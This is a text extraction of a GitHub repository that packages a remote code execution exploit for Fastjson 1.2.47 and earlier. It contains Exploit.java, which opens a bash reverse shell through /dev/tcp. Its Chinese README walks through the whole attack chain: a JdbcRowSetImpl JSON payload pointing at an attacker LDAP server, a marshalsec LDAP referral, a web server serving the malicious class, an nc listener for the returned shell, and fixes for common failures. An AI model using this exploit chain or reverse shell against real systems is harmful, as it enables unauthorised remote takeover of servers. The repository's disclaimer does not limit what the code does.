Full Code of CaijiOrz/fastjson-1.2.47-RCE for AI

master 9e2c04771a2b cached
3 files
40.5 MB
1.3k tokens
3 symbols
1 requests
Download .txt 
Repository: CaijiOrz/fastjson-1.2.47-RCE
Branch: master
Commit: 9e2c04771a2b
Files: 3
Total size: 40.5 MB

Directory structure:
gitextract_emq_86uu/

├── Exploit.java
├── README.md
└── marshalsec-0.0.3-SNAPSHOT-all.jar

================================================
FILE CONTENTS
================================================

================================================
FILE: Exploit.java
================================================
public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

================================================
FILE: README.md
================================================
# fastjson-1.2.47-RCE
Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法,以及避开坑点

以下操作均在Ubuntu 18下亲测可用,openjdk需要切换到8,且使用8的javac
```
> java -version
openjdk versin "1.8.0_222"

> javac -version
javac 1.8.0_222
```

### 声明

使用者在传播、利用本工具所提供的信息过程中,若产生任何直接或间接的后果与损失,均由使用者自行承担责任,作者对此不承担任何责任。
本人保留对此工具的修改权与解释权。未经网络安全部门及相关部门许可,严禁擅自使用本工具开展任何攻击活动,亦不得以任何形式将其用于商业目的。
本工具仅授权于企业内部进行问题排查,严禁用于非法用途。请严格遵守《网络安全法》,否则,作者将不承担任何由此产生的后果。

### 0x00 假设存在漏洞的功能

```
# param参数内容被fastjson调用解析

POST /note/submit/

param={'id':29384,'content':'Hello','type':'string'}
```

### 0x01 测试外连

准备一台服务器监听流量
```
nc -lvvp 7777
```

发送Payload,将IP改为监听服务器IP
```
POST /note/submit/

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}}
```

如果监听服务器有流量,可以继续下一步

### 0x02 准备LDAP服务和Web服务

将marshalsec-0.0.3-SNAPSHOT-all.jar文件和Exploit.java放在同一目录下

在当前目录下运行LDAP服务,修改IP为当前这台服务器的IP
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit
```

在当前目录下运行Web服务
```
python3 -m http.server 80 或者 python -m SimpleHTTPServer 80
```

### 0x03 修改Exploit并编译成class文件

修改Exploit.java中的反弹IP和端口(准备接收反弹SHELL的服务器IP和监听端口)

使用javac编译Exploit.java,生成Exploit.class文件(注意:javac版本最好与目标服务器接近,否则目标服务器无法解析class文件,会报错)
```
javac Exploit.java
```

### 0x03 准备

回顾一下,现在目录应该有三个文件
```
marshalsec-0.0.3-SNAPSHOT-all.jar
Exploit.java
Exploit.class
```

服务器正在开启LDAP和Web
```
LDAP Server:Listening on 0.0.0.0:1389
Web  Server:Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

一个nc正在准备接收反弹回来的SHELL
```
nc -lvvp 7777
```

### 0x04 执行
修改ip为正在运行LDAP和Web服务的服务器IP
```
POST /note/submit

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}
```

接下来如果没有任何报错的话,LDAP将会把请求Redirect到Web服务,Fastjson将会下载Exploit.class,并解析运行

你的LDAP服务和Web服务都会收到请求记录,如果没有问题,你的nc也会收到反弹回来的SHELL

### 0x05 问题

当javac版本和目标服务器差太多,会报一个下面那样的错误,所以需要使用1.8的javac来编译Exploit.java
```
Caused by: java.lang.UnsupportedClassVersionError: Exploit has been compiled by a more recent version of the Java Runtime (class file version 55.0), this version of the Java Runtime only recognizes class file versions up to 52.0
```

当运行LDAP的服务器java版本过高,会无法运行LDAP服务,虽然显示正在Listening,但是Fastjson的JNDI会报错,显示无法获取到资源,所以要使用java 1.8(openjdk 8)来运行LDAP服务


================================================
FILE: marshalsec-0.0.3-SNAPSHOT-all.jar
================================================
[File too large to display: 40.5 MB]
Download .txt 
gitextract_emq_86uu/

├── Exploit.java
├── README.md
└── marshalsec-0.0.3-SNAPSHOT-all.jar
Download .txt 
SYMBOL INDEX (3 symbols across 1 files)

FILE: Exploit.java
  class Exploit (line 1) | public class Exploit {
    method Exploit (line 2) | public Exploit(){
    method main (line 9) | public static void main(String[] argv){
Download .json
Condensed preview — 3 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (4K chars). 
[
  {
    "path": "Exploit.java",
    "chars": 331,
    "preview": "public class Exploit {\n    public Exploit(){\n        try{\n            Runtime.getRuntime().exec(\"/bin/bash -c $@|bash 0 "
  },
  {
    "path": "README.md",
    "chars": 2404,
    "preview": "# fastjson-1.2.47-RCE\nFastjson <= 1.2.47 远程命令执行漏洞利用工具及方法,以及避开坑点\n\n以下操作均在Ubuntu 18下亲测可用,openjdk需要切换到8,且使用8的javac\n```\n> "
  }
]

// ... and 1 more files (download for full content)

About this extraction

This page contains the full source code of the CaijiOrz/fastjson-1.2.47-RCE GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 3 files (40.5 MB), approximately 1.3k tokens, and a symbol index with 3 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Extract another repo
Copied to clipboard!